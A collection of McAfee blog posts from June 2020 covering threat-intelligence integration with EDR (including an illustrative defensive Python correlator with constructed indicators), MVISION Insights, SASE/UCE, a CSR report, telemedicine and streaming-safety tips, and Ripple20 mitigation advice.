Threat intelligence (TI), the art of distilling everything that is happening globally in the adversarial threatscape down to the context your company and your security team actually need in order to take mitigation action, is hard. Yet many companies continue to try to create a threat intelligence capability from the ground up, only to find that their TI programs are not what they really want them to be. No wonder, then, that while 64% of companies say they have threat-intelligence programs, only 36% believe they would catch a sophisticated attacker, according to an Ernst & Young report on cyber threat intelligence. What is causing this disconnect in the effectiveness of TI programs?

A significant part of the problem with TI is that human analysts must absorb the global TI, prioritize it for their organization, and then operationalize locally any intelligence relevant to their company, and that is not easy! Having access to TI is only the first step on the road to adding context to the events your team is seeing inside the network. Turning external threat feeds or data from a Threat Intelligence Program (TIP) into useful context for security teams, and then connecting that context to individual actions and projects, takes time and resources to produce results. The process is often slow and resource-intensive, further delaying detection. Less than 20% of breaches are stopped in a timely fashion (e.g. in a matter of hours), according to Verizon. Worse than that, knowing about a threat before you encounter it (e.g. a campaign) and then being breached while you’re still working on proactively tuning your countermeasures against that threat would be disastrous. A lack of timely, actionable context from TI is therefore a main contributor to NOT being proactively prepared for an attack. Is there any way to produce actionable context, appropriate for your organization, in a timely and resource-efficient manner? Is there any way to expand that context to threats that are NOT yet in your environment but are headed your way?

Threat Intelligence Context: Leverage EDR or Not?

As companies continue to deploy endpoint detection and response (EDR) on users’ machines, security teams are recognizing that the technology can detect anomalous behavior on the endpoint. But determining the degree to which those activities constitute a real threat that matters to you requires more context. Without the context to interpret whether an activity on the system is malicious or benign, companies are limited in their ability to do threat hunting. (Sidebar: threat hunting is the practice of proactively searching for cyber threats that are hidden, undetected, in an organization’s environment.)

Without context-sensitive threat intelligence integrated with EDR, SOC teams are reduced to endlessly searching endpoint events for known IOCs associated with adversaries and then manually cross-correlating them with external TI. They have no way to automatically cross-correlate these events with known adversarial activities or known adversarial TTPs (e.g. knowing the C&C IP address), and they end up with a very low signal-to-noise (SN) ratio, wasting lots of time investigating things that turn out to be nothing because they miss all the TI correlations. Having a way to incorporate TI in a contextual manner would really improve the signal-to-noise ratio and make the SOC team much more effective.

That’s where effective TI integration comes into play and separates effective TI programs from ineffective ones. With properly integrated TI, you should have easy access to things like crowdsourced attack data that identifies Tactics, Techniques and Procedures (TTPs). Once new TTPs have been identified by the cyber intelligence community, this gives threat hunters an easy, high-fidelity way to look for specific attack behaviors in the organization’s environment, knowing which attacks those TTPs are related to. With this kind of TI integration, the Security Operations Center (SOC) can more quickly identify threats and dramatically improve the signal-to-noise ratio for accurately prioritized investigations. However, I would argue that this is just table stakes. What and how can we take TI integration to the next level?

A truly superior TI integration would additionally provide prioritization of known threats based on things like whether the threat is targeting your industry sector and geography and, most importantly, predict the risk of your environment being impacted by the threat. This actionable TI would offer countermeasures and prescribe what you need to do if the countermeasures are predicted to be ineffective. With this next level of TI integration, the SOC can actually move to being more proactive, by automating the analysis of threats that haven’t even been encountered by the organization. The organization is now prepared for attacks that EDR hasn’t even seen yet!
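To make the two ideas above concrete (automatic cross-correlation of endpoint events with campaign IOCs and TTPs, and prioritization of campaigns by sector/geography relevance plus a local countermeasure check), here is an added example correlator. It is illustrative code written for this page, not McAfee's or MVISION Insights' code. The organisation profile, countermeasure names, campaign names, indicators, hosts and ATT&CK-style technique ids are all constructed placeholders; a real feed and a real EDR would supply the data.

```python
"""Added example: a small TI-to-EDR correlator (constructed data, not McAfee code).

Steps:
  1. match endpoint events against each campaign's IOCs and TTP ids,
  2. score each campaign by relevance to the org's sector and geography,
  3. check whether the org's enabled countermeasures cover what the feed says
     stops the campaign, and surface relevant-but-unseen campaigns proactively.
"""

# --- constructed organisation posture -----------------------------------------
ORG_PROFILE = {"sector": "finance", "geo": "AU"}
ORG_COUNTERMEASURES = {          # True = enabled on the endpoints (constructed)
    "exploit_prevention": True,
    "web_control": False,
    "script_scanning": True,
}

# --- constructed TI feed: three hypothetical campaigns --------------------------
TI_FEED = [
    {
        "campaign": "CAMPAIGN-ALPHA",
        "iocs": {"ip": {"203.0.113.10"}, "sha256": {"a1" * 32}},
        "ttps": {"T1059.001", "T1071.001"},      # ATT&CK-style technique ids
        "sectors": {"finance", "government"},
        "geos": {"AU", "NZ"},
        # countermeasures the feed says are sufficient to block the campaign
        "stopped_by": {"exploit_prevention", "web_control"},
    },
    {
        "campaign": "CAMPAIGN-BETA",
        "iocs": {"ip": {"198.51.100.7"}, "sha256": set()},
        "ttps": {"T1547.001"},
        "sectors": {"retail"},
        "geos": {"US"},
        "stopped_by": {"script_scanning"},
    },
    {   # targets this org but has not been seen locally yet
        "campaign": "CAMPAIGN-GAMMA",
        "iocs": {"ip": {"192.0.2.200"}, "sha256": set()},
        "ttps": {"T1566.001"},
        "sectors": {"finance"},
        "geos": {"AU"},
        "stopped_by": {"web_control"},
    },
]

# --- constructed endpoint events, as an EDR sensor might emit them -------------
ENDPOINT_EVENTS = [
    {"host": "ws-01", "process": "powershell.exe",
     "dest_ip": "203.0.113.10", "sha256": "ff" * 32, "ttp": "T1059.001"},
    {"host": "ws-02", "process": "chrome.exe",
     "dest_ip": "192.0.2.55", "sha256": "ee" * 32, "ttp": None},
    {"host": "ws-03", "process": "svchost.exe",
     "dest_ip": "198.51.100.7", "sha256": "dd" * 32, "ttp": None},
]


def match_event(event, campaign):
    """Return the reasons an event matches a campaign (empty list = no match)."""
    reasons = []
    if event["dest_ip"] in campaign["iocs"]["ip"]:
        reasons.append(f"ioc:ip:{event['dest_ip']}")
    if event["sha256"] in campaign["iocs"]["sha256"]:
        reasons.append(f"ioc:sha256:{event['sha256'][:8]}")
    if event["ttp"] and event["ttp"] in campaign["ttps"]:
        reasons.append(f"ttp:{event['ttp']}")
    return reasons


def relevance(campaign, org):
    """0.0-1.0: how much the campaign targets this org's sector and geography."""
    score = 0.0
    if org["sector"] in campaign["sectors"]:
        score += 0.5
    if org["geo"] in campaign["geos"]:
        score += 0.5
    return score


def posture_gap(campaign, countermeasures):
    """Countermeasures the feed relies on that the org has NOT enabled."""
    return sorted(c for c in campaign["stopped_by"] if not countermeasures.get(c, False))


def prioritize(events, feed, org, countermeasures):
    """Correlate, score and rank campaigns.

    A campaign is reported if it has local evidence ("active"), or if it targets
    this org and the org's countermeasures are not expected to hold ("proactive").
    """
    findings = []
    for campaign in feed:
        hits = [{"host": e["host"], "reasons": match_event(e, campaign)}
                for e in events if match_event(e, campaign)]
        rel = relevance(campaign, org)
        gap = posture_gap(campaign, countermeasures)
        if not hits and not (rel > 0 and gap):
            continue  # neither seen locally nor a relevant exposure: pure noise
        # local evidence weighted by targeting relevance, plus a bump for exposure
        priority = len(hits) * (0.5 + rel) + rel + (1.0 if gap else 0.0)
        findings.append({
            "campaign": campaign["campaign"],
            "status": "active" if hits else "proactive",
            "priority": round(priority, 2),
            "relevance": rel,
            "hits": hits,
            "missing_countermeasures": gap,
            "holds": not gap,
        })
    return sorted(findings, key=lambda f: f["priority"], reverse=True)


if __name__ == "__main__":
    for f in prioritize(ENDPOINT_EVENTS, TI_FEED, ORG_PROFILE, ORG_COUNTERMEASURES):
        print(f["campaign"], f["status"], f["priority"], f["hits"],
              "missing:", f["missing_countermeasures"])
```

Running it ranks CAMPAIGN-ALPHA first (seen on ws-01, targets this sector and geography, and web_control is missing), then CAMPAIGN-GAMMA as a proactive finding with no local hits, and CAMPAIGN-BETA last: it was observed, but it targets a different sector and the expected countermeasure is already in place. The scoring weights are arbitrary; the point is that relevance and posture, not just IOC hits, drive the queue.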

Reality check here, how many organizations have this level of context and integration on threats? Not many.  

The ones I am aware of today, are the current McAfee customers who participated in our Joint Development Program for MVISION Insights this past quarter.  

McAfee has created its MVISION Insights service to provide superior, integrated TI so that security teams can prioritize and predict threats by cross-correlating known campaigns, using industry and geographical threat activity, with their own security posture derived from their security telemetry, and prescribe the most effective way of dealing with the threat. This kind of solution empowers the SOC to move beyond manual TI cross-correlation, to much more easily prioritize the threats that matter, and to move from being reactive to being a lot more proactive.

MVISION Insights empowers McAfee MVISION EDR for the SOC analyst on many fronts by offering more actionable context so the SOC can be more proactive.

This kind of TI integration can reduce the unnecessary investigations that a SOC does and can also improve the speed and accuracy of the investigations that have resources assigned. By having the context of a threat (e.g. organized, curated TTPs for campaigns, the attack operation and objective, a list of IOCs, etc.), the SOC analyst can apply this context to a current investigation and really reduce the time and effort to complete it. Additional context like this can both eliminate unnecessary investigations and accelerate the investigation to decisive resolution.

TI Context is King But… 

We have seen that as EDR capabilities become more widely adopted, it is becoming increasingly clear that knowing what is happening on the endpoint and ‘looking for clues’ is not enough. Without meaningful and automated context from a properly integrated TI capability, companies are slower to identify malicious events, may not prioritize attack investigations for threats headed their way, and could take the wrong steps to remediate threats. The problem is that time is critical: an attacker can use a couple of days to do really bad things in your network. Having effective, automated signal-to-noise improvement through a properly integrated TI program can help you quickly detect and hunt down attackers and be proactive against threats that are headed your way but are not yet in your environment.

Context is not just a brief writeup from a TIP or an external threat intelligence feed. Typically, a human must read, interpret and analyze that feed, often leading to a significant delay in incorporating the information into the SOC response. In most cases, TI products do not offer enough remediation guidance; they just provide the threat profile.

A properly integrated TI program can solve these problems, and a superior TI integration can move the SOC to being proactive. McAfee’s MVISION Insights delivers actionable intelligence and context in an automated way that can augment and speed investigations and make the SOC proactive with respect to threats that haven’t even been detected in the organization. By freeing analysts from manual analysis of intelligence feeds, companies can catch more attacks more quickly and be proactive against threats targeting them.

Moreover, the insight does not come from a few instances or open-source feeds, but from the entire McAfee customer base across the globe, from over 1B sensors.

Many companies are delivering machine learning and artificial intelligence applications to security orchestration, automation and response. Very few possess the data and context from a customer base as large as ours.

Having the right TI context from a well-respected source with statistical reach, together with threat analysis that is actionable, gives organizations the confidence to address a sophisticated attacker before their attack, elevates this TI context to new heights, and shifts cyber security to be more proactive.

For more on McAfee Insights, check out our webinar.  

Get Ahead of the Adversary with Proactive Endpoint Security  

The post Meaningful Context for Your Endpoint Threat Investigations appeared first on McAfee Blogs.

Industry Experts Weigh in on McAfee’s Proactive Cybersecurity https://www.mcafee.com/blogs/enterprise/industry-experts-weigh-in-on-mcafees-proactive-cybersecurity/ https://www.mcafee.com/blogs/enterprise/industry-experts-weigh-in-on-mcafees-proactive-cybersecurity/#respond Mon, 29 Jun 2020 17:19:06 +0000 /blogs/?p=102241

Recently Forbes shared an accurate depiction of McAfee in its article, McAfee Finally On The Right Path. Let me extend their innovation story and share with you the leadership path McAfee continues to blaze in cybersecurity.

Imagine if organizations knew of high severity threats targeting their industry sector and geographies before they encountered such threats, with precise knowledge of whether their countermeasures could stop the threat. Also imagine that if the countermeasures could not stop the threats, they knew what they should do to improve those countermeasures so that the threat would be stopped. Doing all these actions, before an attack impacts you, is referred to as “shifting left on the attack lifecycle.” Gartner and many other analyst firms have openly expressed that shifting left is something a lot of vendors are trying to achieve. I am excited to announce that McAfee has found a way to do it.

So, how did we do it? Enter McAfee MVISION Insights. We previewed this innovation at MPOWER in October 2019 – a unique solution helping organizations become more proactive. MVISION Insights is a cloud-native solution that provides highly predictive security analytics. These analytics enable proactive management and remediation against advanced attacks.

News of MVISION Insights created quite a buzz among industry influencers when we briefed them. The resounding point of view was that McAfee MVISION Insights is in a class of its own and “ahead of the market”.

A highly reputed analyst cast MVISION Insights at the same level of high esteem as McAfee’s highly acclaimed unified management solution, ePolicy Orchestrator 

“In the same way ePO is the gold standard for management consoles, Insights can be the same for the threat/analytics platform” 

– Top Tier Analyst Firm  

Yet other analysts called out the lack of immediate competition.   

“The vendor has stolen a march on some of its competitors, at least in the short term, with this offering. A lot of vendors are aiming to get to an offering comprising threat intel + prioritization + recommendations + automation, but few if any have actually reached that point today.” 

– Omdia research

‘You are forward leaning and a differentiator in this space.  And it is even more impressive you did this organically while your competitors are trying to piece together with partnerships’ 

– Top Tier Analyst Firm 

Many vendors are making big claims about all the data they have access to and their rich telemetry, but they don’t weave the pieces together with why it is relevant to an organization’s environment. MVISION Insights not only prioritizes the threats based on prevalence in the organization’s geography and industry sector but also takes the prioritized threat analysis and assesses your local security posture to see how it will stack up against the threat. This value of the local security posture assessment against the threat was also called out: “…a key value point here is the local security posture assessment with the vast threat intelligence and analytics.”

ESG recognized: “With the exposure of any new security attack, CISOs, CEOs, and corporate boards immediately ask whether they are at risk. MVISION Insights from McAfee can help automate answers to this question. This gives organizations the ability to think globally, act locally, and respond quickly to cyber-attacks.”

It’s not just threat analysis paralysis but prioritized actionable insights.

With MVISION Insights, organizations can answer critical questions quickly: Are they at risk? What is their priority? Will their protections hold? What do they need to do to be protected? Take a closer look at MVISION Insights, coming soon. Soon I plan to share the customer feedback we are receiving from organizations accessing the early solution. You don’t want to miss it.

McAfee Vision for SASE: Making Cloud Adoption Fast, Easy and Secure https://www.mcafee.com/blogs/enterprise/cloud-security/mcafee-vision-for-sase-making-cloud-adoption-fast-easy-and-secure/ https://www.mcafee.com/blogs/enterprise/cloud-security/mcafee-vision-for-sase-making-cloud-adoption-fast-easy-and-secure/#respond Fri, 26 Jun 2020 20:31:58 +0000 /blogs/?p=102223


While cloud services deliver on promised savings and convenience, keeping everything secure remains a moving target for many organizations.

That’s because the enterprise perimeter has not only expanded, it has pushed the service edge to anywhere business takes you—or employees choose to go. Consequently, many organizations must uplevel how they protect cloud-based apps, data and services. Achieving success will be difficult with walled-garden style defenses found in legacy environments.

Gartner suggests a Continuous Adaptive Risk and Trust Assessment (CARTA) approach to secure the use of cloud applications, and it recommends a Secure Access Service Edge (SASE) framework to deliver connectivity and security for cloud applications.

A lot of SASE vendors have focused on convergence of networking and security, but the key business goal of SASE is to protect applications and data in the cloud by building a pervasive edge that spans all manners of accessing these applications and data.

McAfee’s MVISION Unified Cloud Edge (UCE) delivers this pervasive edge and enables organizations to apply consistent data protection and threat prevention policies across their entire estate, including users, devices, locations and applications. Under the covers, MVISION UCE is a convergence of Cloud Access Security Broker (CASB), next-gen Secure Web Gateway (SWG), and data loss protection (DLP) technologies delivered via a single global cloud fabric, with consistent policy and incident management. Each of the MVISION UCE components provides coverage over a distinct control point, and together they deliver the pervasive edge:

  • McAfee CASB provides direct visibility and control over cloud-native interactions that are impossible to broker via a network/man-in-the-middle approach. This not only includes real time data and threat protection for data being stored/created in the cloud, it also includes on-demand scanning over existing data to identify both sensitive data and malware. The data objects could include files, messages and field data such as structured data objects in business applications like Salesforce.com, ServiceNow, Workday, etc.
  • McAfee’s next-gen SWG establishes proxy-based visibility and control over web traffic with deep awareness of cloud activity and data interactions. This keeps users safe from accidental data loss or malware, and it delivers advanced threat protection against ransomware, phishing attempts and other advanced attacks by integrating Remote Browser Isolation (RBI), a recommended part of a SASE architecture, into the next-gen SWG.
  • A common DLP engine that provides device-to-cloud visibility and control over sensitive data on personal or managed devices, data resident and transacted in the cloud and data transiting over the network. McAfee MVISION UCE shares data classifications with all enforcement points for device, network, and the cloud with a single incident management console and API.

The convergence of cloud-native SWG and CASB also enables use cases that can extend network-delivered SASE controls with deep context of cloud applications in a single fabric. Many cloud-application-centric use cases that are critical in a post-COVID work from home scenario cannot be delivered by pure-play cloud SWGs, including:

  • The ability to apply contextual access control to users connecting to sanctioned Cloud applications directly over the internet, without a VPN. MVISION UCE ensures a user with a corporate device has full access to Microsoft 365, whereas a user with an unmanaged device has read-only access, which can be delivered by an app-proxy or remote browser isolation.
  • The ability to control unsanctioned Cloud applications at different levels of granularity including tenancy, activity and data. McAfee provides consistent policies that specifically identify and grant permissions to unsanctioned or personal services like OneDrive where the cloud user can be blocked from synching any data to personal OneDrive, or can be blocked from synching only “classified or sensitive” data to personal OneDrive.
  • The ability to protect against day-zero threats from the cloud in real time without any friction to the user experience. McAfee helps prevent end users from syncing or downloading malware delivered from a trusted cloud storage provider such as OneDrive, Google Drive or Dropbox.

In addition, most SASE vendors today focus on user-to-cloud security, otherwise known as front-door controls, but that is not sufficient. Data and threats also need to be protected across side doors in the cloud, and protection needs to be extended to back doors within the cloud. McAfee’s MVISION UCE delivers side- and back-door controls that are not offered by any other SASE vendor:

  • Connected Application Control enables your architecture to discover SaaS applications or home-grown applications connected to each other via API channels, and then to authorize these API connections based on policies, risk and the behavior of the connected application. For instance, a Sales VP might connect Clari, a sales forecasting mobile application, to the corporate Salesforce.com instance and pull all of the Salesforce.com data into Clari. The SASE architecture needs to be able to discover all such app-to-app connections and apply granular policies on what scope of access should be allowed.

  • SaaS Cloud Security Posture Management (CSPM) allows your SASE architecture to assess and manage the security posture of your SaaS provider’s control and management planes. Microsoft 365 alone has more than 200 individual configuration settings that need to be evaluated for an appropriate security posture; for example, SharePoint’s default sharing permissions make shared links available to anyone in the world and never expire.

  • Sharing and Collaboration Control enables your architecture to control the flow of sensitive data being shared inappropriately between users within the organization or across organizations via popular collaboration platforms such as Microsoft OneDrive, Microsoft Teams, Slack, Zoom, etc. For example, McAfee helps ensure sensitive data is not posted to external (guest) users in Microsoft Teams.

Cloud-native

Long promised, cloud transformation is catching on at a time when enterprises increasingly rely upon cloud services to support their expanding digital activities. It can support large parts of the workforce who are working remotely and from home. Data and threat controls must work in real time as data moves to and from cloud applications. Accordingly, organizations need a cloud-native security architecture that is frictionless and ensures cloud applications function without latency or application breakage, with security delivered in real time. This real-time capability is not just necessary for network controls delivered by the SWG service; it is equally essential for cloud-native controls delivered via API and email gateways. Gartner describes the use of Points of Presence (POPs) for global distribution and scale in SASE architectures. Most vendors offering SASE describe their footprint in terms of their network POPs. McAfee MVISION UCE has more than 50 globally distributed network POPs, but it also has similar scale and capacity for API and email POPs to ensure pervasive real-time control.

By our estimate, load on cloud security services has soared by between 200% and 700% in the last three months. While this surge has caused many other SASE providers to buckle, McAfee has logged 99.999% uptime. This is largely driven by our cloud-native architecture, which does not rely on racking and stacking network appliances in public cloud, or purely on colocation POPs that might have longer lead times to build out and support burst capacity. McAfee MVISION UCE is not only built in a cloud-native (i.e. software-defined) manner and deployed in POPs around the world, it also has the ability to leverage public cloud providers such as AWS, Azure and GCP for burst POP capacity in order to deliver surge capacity without delay.

MVISION UCE, with its focus on protecting data and preventing threats in the cloud, along with its approach to both network-based and cloud-native controls, marks a key milestone on the path to implementing Gartner’s SASE framework.

Click here to learn more about McAfee MVISION UCE.

How McAfee Makes an Impact: 2019 CSR Report Launch https://www.mcafee.com/blogs/other-blogs/executive-perspectives/how-mcafee-makes-an-impact-2019-csr-report-launch/ https://www.mcafee.com/blogs/other-blogs/executive-perspectives/how-mcafee-makes-an-impact-2019-csr-report-launch/#respond Thu, 25 Jun 2020 15:00:15 +0000 /blogs/?p=102166


At McAfee, we defend the world from cyber threats. We live our values daily. But most importantly, we recognize the power of inclusion and diversity in helping to create a better world inside and outside of McAfee.

Recently, we launched our 2019 corporate social responsibility report—our Impact Report. Last year, just our second year as the new McAfee, we published our collective actions and 2018 workforce demographics as part of McAfee’s first-ever Inclusion & Diversity Report.

This year, we’re providing greater insights on the progress we’re making to positively impact our people, our community, and our planet, together. As a company, we believe in proactively publishing this report with greater transparency, driving greater accountability and progress—not just for McAfee, but the industry as a whole.

We’ve made progress in our second year as the new McAfee and continue to reach major milestones. We achieved global pay parity. Our evolving hiring and retention practices brought us to the attainment of our 30% diversity goal and we made significant strides in our community outreach and sustainability practices.

We know genuine change requires continuous commitment and we’re up to the challenge. We look forward to working towards a more inclusive, sustainable world, and commit to refining our diversity hiring practices, ensuring equal career progression opportunities, actively developing cybersecurity interest in future generations, mobilizing our employees in their communities, and doing our part to protect our planet.

To understand the reach of McAfee’s impact, you can browse the report or read the highlights below.


Medical Care #FromHome: Telemedicine and Seniors https://www.mcafee.com/blogs/consumer/medical-care-fromhome-telemedicine-and-seniors/ Wed, 24 Jun 2020 13:43:11 +0000 /blogs/?p=102142


Medical Care From Home: Telemedicine and Seniors

For weeks and even months now, millions of us have relied on the internet in ways we haven’t before. We’ve worked remotely on it, our children have schooled from home on it, and we’ve pushed the limits of our household bandwidth as families have streamed, gamed, and conferenced all at the same time. Something else is new: more and more of us have paid visits to our doctors and healthcare professionals on the internet. Needless to say, this is an entirely new experience for many. And with that, I got to thinking about seniors. What’s been their experience with telemedicine? What concerns have they had? And how can we help?

For starters, an online doctor’s visit is known as telemedicine—a way of getting a medical issue diagnosed and treated remotely. With telemedicine, care comes by way of your smartphone or computer via a video conference or a healthcare provider’s portal.

Telemedicine is not new at all. It’s been in use for some time now, such as in rural communities that have little access to local healthcare professionals, in cases of ongoing treatment like heart health monitoring and diabetes care, and situations where a visit to the doctor’s office simply isn’t practical. What is new is this: the use of telemedicine has made a significant leap in recent months.

Telemedicine for seniors (and everyone else) is on the rise

A recent global consumer survey by Dynata took a closer look at this trend. The research, which spanned age groups and nations across North America and Europe, found that 39% of its respondents consulted a physician or healthcare professional online in the past few months. Of them, two-thirds said they used telemedicine as part of their care. Yet more telling, 84% of those who recently had a telemedicine appointment said this was the first time they used telemedicine.

The study also looked at their attitudes and experiences with telemedicine based on age and reported that members of the Baby Boomer generation found the experience to be satisfactory—just over 55%. Interestingly, this was quite consistent across other age groups as well, with all of them hovering just above or below that same level of satisfaction.

Have seniors changed their feelings about telemedicine?

One other study gives us some insight into how the opinions seniors hold about telemedicine may have changed in the past year. We can contrast the findings above with a University of Michigan study that polled American adults aged 50 to 80 in the middle of 2019. On the topic of telemedicine, the research found that:

  • 64% would consider using telemedicine if they had an unexpected illness while traveling
  • 58% saw it as an option for a return visit or follow-up
  • 34% would use it to address a new health concern

The study also asked how older Americans felt about telemedicine visits. At that time in 2019, only 14% said that their provider offered telemedicine visits, while 55% didn’t know if they had the option available to them at all. Just a small number, 4%, said they’d had a telemedicine visit within the year. Needless to say, it’ll be interesting to see what 2020’s results would have to say should the university run this poll again.

Among those who had at least one telemedicine visit, 58% felt that in-person office visits provided an overall better level of care, and about 55% felt that in-person visits were better for communicating with their health care professional and for feeling better cared for overall.

Older adults and seniors express concerns about telemedicine

Citing the same University of Michigan study from last year, some of the concerns older adults shared are what you might expect, even regardless of age. The lack of a physical exam (71%), worries that the care might not be as good as a face-to-face visit (68%), and losing the feeling of a personal connection with their health care professional (49%) all ranked high.

Of note, three other concerns around technology also topped the responses:

  • Privacy (49%)
  • Issues using the technology needed to connect (47%)
  • Difficulty seeing or hearing their care provider (39%)

Once again, you can make a strong case that plenty of people might share these same concerns—not just seniors.

Your first telemedicine visit

On the subject of the actual telemedicine visit, let’s turn to some expert advice on the topic. The AARP (American Association of Retired Persons) offers a step-by-step guide on how to prepare for your first telemedicine visit. Their first piece of advice is “make sure you are tech-ready” for your appointment. And that’s one place I can help. Let’s take a look at some of those top concerns about technology.

Some of my advice here mirrors what I shared a few weeks ago about getting ready for an online job interview, and you can keep the following in mind:

Pick your device of choice and get it set up for telemedicine

You’ll need a device for your visit, so choose the one you know and that you’re comfortable with. That’s probably your computer or laptop. And just like with any video conferencing you do, spend some time getting familiar with how to set the microphone levels, speaker volume, and the camera. For audio, you can use a set of smartphone earbuds, which can help prevent audio feedback loops and simply make it easier to hear your caregiver.

As for cameras, many laptops have them built in as a standard feature. If that’s not the case for you, or if you have a desktop computer without a camera, there are several inexpensive options. If you’re shopping around, do a little research. There are plenty of reputable sites that provide mini-reviews, pricing overviews, and give you a sense for where you can make your purchase right now.  As with any connected device, be sure to change any default passwords to a strong, unique password.

And if you can, do a dry run before your appointment. Reach out to a friend or relative and set up a quick video call with your computer or laptop. That way, you can get a feel for the experience and fine tune your settings as you like.

In other instances, the care provider will have an app that you’ll need to download or an online portal that you’ll need to access. If this is the case, don’t worry. You can still practice using your camera and your audio ahead of time with a trusted video conferencing application like Apple’s FaceTime or Microsoft’s Skype.

Make sure your technology is secure

If you don’t already have a comprehensive security solution in place, get one. This will protect you against malware, viruses, and phishing attacks. You’ll also benefit from other features that help you manage your passwords, protect your identity, safeguard your privacy, and more.

As for privacy in general, medical information is among the most precious information you have. For example, here in the U.S., we have HIPAA privacy standards to protect our medical records and conversations. Yet there’s also the issue of eavesdropping, which is a risk in practically any online communication. Here, you’ll want to do some research. A reputable health care provider will have a comprehensive set of Frequently Asked Questions (FAQ) available as part of their telemedicine service, which should include a section on your personal privacy and the technology they use. (Here’s a good example of a telemedicine FAQ from University of Washington Medicine.) Consult that FAQ, and if you have further questions, feel free to call the healthcare provider and speak with them.

If you find yourself searching online for a telemedicine provider, look out for bad links and phishing scams. It’s a sad state of affairs, yet hackers are capitalizing on today’s healthcare climate just as they’ve taken advantage of innocent people in times of need before. Use a web advisor with your browser that will alert you of malicious links and never click any link or open any email that you’re unsure of. Again, your security software should help you steer clear of trouble.

The best telemedicine choice is the one that is right for you

We’ve welcomed the internet into so many aspects of our lives, right on down to purchasing connected refrigerators and washing machines. Yet inviting the internet into other aspects of our lives, like our health and that of our loved ones, may not come so quickly. To put it bluntly, getting comfortable with the idea of online doctor’s visits may take some time. However, with research and conversation with your healthcare provider, you may find that a telemedicine visit will work just as well, or well enough, as an in-person visit in some cases. As you make those very personal decisions for yourself, I hope this article and the resources cited within it helps you make a choice that’s absolutely right for you.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.
Read Before You Binge-Watch: Here are the TV Shows & Movies to Look Out For https://www.mcafee.com/blogs/consumer/mcafee-findings-reveals-tv-shows-movies/ Tue, 23 Jun 2020 04:01:52 +0000 /blogs/?p=101832


If you’ve been following recent stay-at-home orders, it’s likely that you’ve been scavenging the internet for new content to help pass the time. In fact, according to Nielsen, there was an 85% increase in American streaming rates in the first three weeks of March this year compared to March 2019 reports.

But having multiple streaming subscriptions can quickly add up. Consequently, users who are hesitant to pay more for online streaming subscriptions often look for free options to stream their favorite TV show or movie.

Criminals are often behind these websites, luring unsuspecting users into schemes via “free” downloads of movies and TV shows. Some of these movies and shows are riskier than others, however. McAfee WebAdvisor data has revealed that certain titles are tied to potential malware and phishing threats.

Let’s take a look at the TV shows and movies that could lead you to a dangerous download instead of your next film spree, as well as discuss what users can do to stay secure. 

Top 10 U.S. TV and Movie Titles That Could Lead You to a Dangerous Download:

Top 10 U.S. TV Titles:

  • “Brooklyn Nine-Nine”
  • “Elite”
  • “Harlots”
  • “Letterkenny”
  • “Poldark”
  • “Lost”
  • “You”
  • “Gentefied”
  • “PEN15”
  • “Skins”

Top 10 U.S. Movie Titles:

  • “Warrior”
  • “Zombieland”
  • “The Incredibles”
  • “Step Brothers”
  • “Bad Boys”
  • “Aladdin” (2019)
  • “The Lion King” (1994)
  • “Swingers”
  • “Frozen 2”
  • “The Invitation”

Stay Protected While Streaming

While consumers search for new content from home, criminals are clearly searching for ways to trick eager TV and movie fans. However, there are still ways users can stay both entertained and secure during this time. Follow these tips to help ensure that your online entertainment experience is safe.

Watch what you click

Users looking to catch up on Season 2 of “You” or watch “The Incredibles” on repeat should be cautious and only access entertainment content directly from a reliable source. The safest thing to do is to subscribe to a streaming site that offers the content or download the movie from a credible website instead of downloading a “free” version from a website that could contain malware.

Refrain from using illegal streaming sites

Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source. 

Use a comprehensive security solution

Use a solution like McAfee Total Protection. This can help protect your devices from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites. Additionally, McAfee WebAdvisor can be accessed as a free download.  

Use parental control software

Kids are tech-savvy and may search for movies by themselves. Ensure that limits are set on your child’s device and use software that can help minimize exposure to potentially malicious or inappropriate websites.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.  

*Methodology: McAfee pulled the most popular TV and movie titles available on U.S. streaming sites according to “best of” articles by a range of U.S. publications. The web results for the searches of the entertainment titles with modifying terms, such as “TV show” and “torrent,” were then analyzed. Other popular modifying search terms include “free download,” “free login,” “free,” and “pirated download.” From there, the resulting URLs and domains were measured using McAfee WebAdvisor data and assigned a score of high, medium, or unverified risk. The results identified the top 10 TV shows and movie titles with the highest risk of being used by criminals to spread malware and phishing threats.  

Ripple20 Vulnerability Mitigation Best Practices https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ripple20-vulnerability-mitigation-best-practices/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ripple20-vulnerability-mitigation-best-practices/#respond Mon, 22 Jun 2020 22:32:25 +0000 /blogs/?p=102115


On June 16th, the Department of Homeland Security and CISA ICS-CERT issued a critical security advisory warning covering multiple newly discovered vulnerabilities affecting Internet-connected devices manufactured by multiple vendors. This set of 19 vulnerabilities in a low-level TCP/IP software library developed by Treck has been dubbed “Ripple20” by researchers from JSOF.

A networking stack is a software component that provides network connectivity over the standard internet protocols. In this specific case these protocols include ARP, IP (versions 4 and 6), ICMPv4, UDP and TCP communications protocols, as well as the DNS and DHCP application protocols. The Treck networking stack is used across a broad range of industries (medical, government, academia, utilities, etc.), from a broad range of device manufacturers – a fact which enhances their impact and scope, as each manufacturer needs to push an update for their devices independently of all others. In other words, the impact ripples out across the industry due to complexities in the supply and design chains.

Identifying vulnerable devices on your network is a crucial step in assessing the risk of Ripple20 to your organization. While a simple Shodan search for “treck” shows approximately 1000 devices, which are highly likely to be internet-facing vulnerable devices, this represents only a fraction of the impacted devices. Identification of the Treck networking stack vs. other networking stacks (such as the native Linux or Windows stacks) requires detailed analysis and fingerprinting techniques based on the results of network scans of the devices in question.

The impact of these vulnerabilities ranges from denial of service to full remote code exploitation over the internet, with at least one case not requiring any authentication (CVE-2020-11901). JSOF researchers identified that these vulnerabilities impact a combination of traditional and IoT devices. Customers should review advisories from vendors such as Intel and HP because non-IoT devices may be running firmware that makes use of the Treck networking stack.

Ripple20’s most significant impact is on devices whose network stack is exposed (in general, IoT devices incorporating the Treck network stack), compared to devices in which the stack is exposed only to the local device. We recommend that you audit all network-enabled devices to determine if they are susceptible to these vulnerabilities.

